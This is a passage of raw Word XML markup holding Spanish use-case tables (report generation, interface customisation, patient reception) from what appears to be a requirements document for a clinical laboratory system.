            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2243" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Proceso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6555" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38"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sidRPr="00AA49FD">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">1.- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA49FD">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ingresa al área de Parametrización de análisis.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38"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    1.1 Busca el análisis para gestionar Parametrización</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="00AA49FD" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    1.2 Guarda algún cambio realizado.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="009238CB" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="00BB4BD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243" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Postcondición</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6555" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Ninguno</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="00BB4BD8">
        <w:trPr>
          <w:trHeight w:val="947"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2243" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Excepciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6555" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="000C2AF7"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Pr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">1.1 </w:t>
            </w:r>
            <w:r w:rsidRPr="003F592B">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Si no se encuentra el análisis preguntar si desea agregarlo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="00491F38">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Ttulo4Car"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="00491F38"/>
    <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="007E1287">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc454371314"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Generar reporte</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="00491F38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3390">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F3426BD" wp14:editId="0EBF1DDE">
            <wp:extent cx="5734050" cy="3412164"/>
            <wp:effectExtent l="0" t="0" r="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8737" cy="3414953"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabladecuadrcula4-nfasis1"/>
        <w:tblW w:w="9063" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2693"/>
        <w:gridCol w:w="6370"/>
      </w:tblGrid>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">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Caso de Uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>CU8</w:t>
            </w:r>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="007E1287">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Generar reporte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38"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Propósito</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Gestionar los reportes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="253"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:spacing w:line="120" w:lineRule="exact"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Pr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Permite gestionar los tipos de reporte que el sistema pudiese dar.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">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Actores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Administrador</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="253"/>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Actor Iniciador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Pr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Administrador</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38"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Precondición</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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CU22. Gestionar lista de precios, CU23. Gestionar caja, CU6. Detallar bitácora.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="260"/>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Proceso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.-  Buscar reporte que se desea dar.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="003B7F83"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Pr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r w:rsidRPr="003B7F83">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.1 Buscar reporte</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="003B7F83"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sidRPr="003B7F83">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">      1.1 Mostrar el reporte</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="00934CF3" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38"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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Postcondición</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Generar reporte.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="594"/>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Excepciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="000C2AF7"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Pr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.1 Si no existe tal reporte no se procederá a realizar el reporte.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="007E1287">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc454371315"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Personalizar interfaz</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="00491F38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4674">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54E99534" wp14:editId="200DD7A4">
            <wp:extent cx="5734050" cy="3643896"/>
            <wp:effectExtent l="0" t="0" r="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7926" cy="3646359"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabladecuadrcula4-nfasis1"/>
        <w:tblW w:w="9063" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2693"/>
        <w:gridCol w:w="6370"/>
      </w:tblGrid>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">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Caso de Uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>CU9</w:t>
            </w:r>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Personalizar interfaz </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38"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Propósito</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Gestionar los reportes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="253"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:spacing w:line="120" w:lineRule="exact"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Pr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Permite gestionar los tipos de reporte que el sistema pudiese dar.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">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Actores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Usuario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="253"/>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Actor Iniciador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Pr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Usuario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38"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Precondición</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Gestionar lista de precios, Gestionar caja, Detallar bitácora.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="260"/>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Proceso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.-  Buscar reporte que se desea dar.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="003B7F83"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Pr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r w:rsidRPr="003B7F83">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.1 Buscar reporte</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="003B7F83"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sidRPr="003B7F83">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">      1.1 Mostrar el reporte</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="00934CF3" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E128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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Postcondición</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F3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Generar reporte.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="594"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Excepciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="000C2AF7" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.1 Si no existe tal reporte no se procederá a realizar el reporte.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00491F38" w:rsidRPr="00DC78F4" w:rsidRDefault="00491F38" w:rsidP="00491F38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D8083F" w:rsidRDefault="00D8083F" w:rsidP="00BB4BD8">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc454371316"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Recepción paciente</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w:rsidR="00D8083F" w:rsidRDefault="00D8083F" w:rsidP="00D8083F">
      <w:r w:rsidRPr="00F07F48">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E1669B2" wp14:editId="4CE1B791">
            <wp:extent cx="5529532" cy="285866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2968" cy="2865612"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabladecuadrcula4-nfasis1"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2170"/>
        <w:gridCol w:w="6658"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D8083F" w:rsidTr="00BB4BD8">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29" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00D8083F" w:rsidRPr="00D201B5" w:rsidRDefault="00D8083F" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D201B5">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Caso de Uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3771" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00D8083F" w:rsidRPr="00D201B5" w:rsidRDefault="00D8083F" w:rsidP="0074429D">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>CU10</w:t>
            </w:r>
            <w:r w:rsidRPr="00D201B5">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
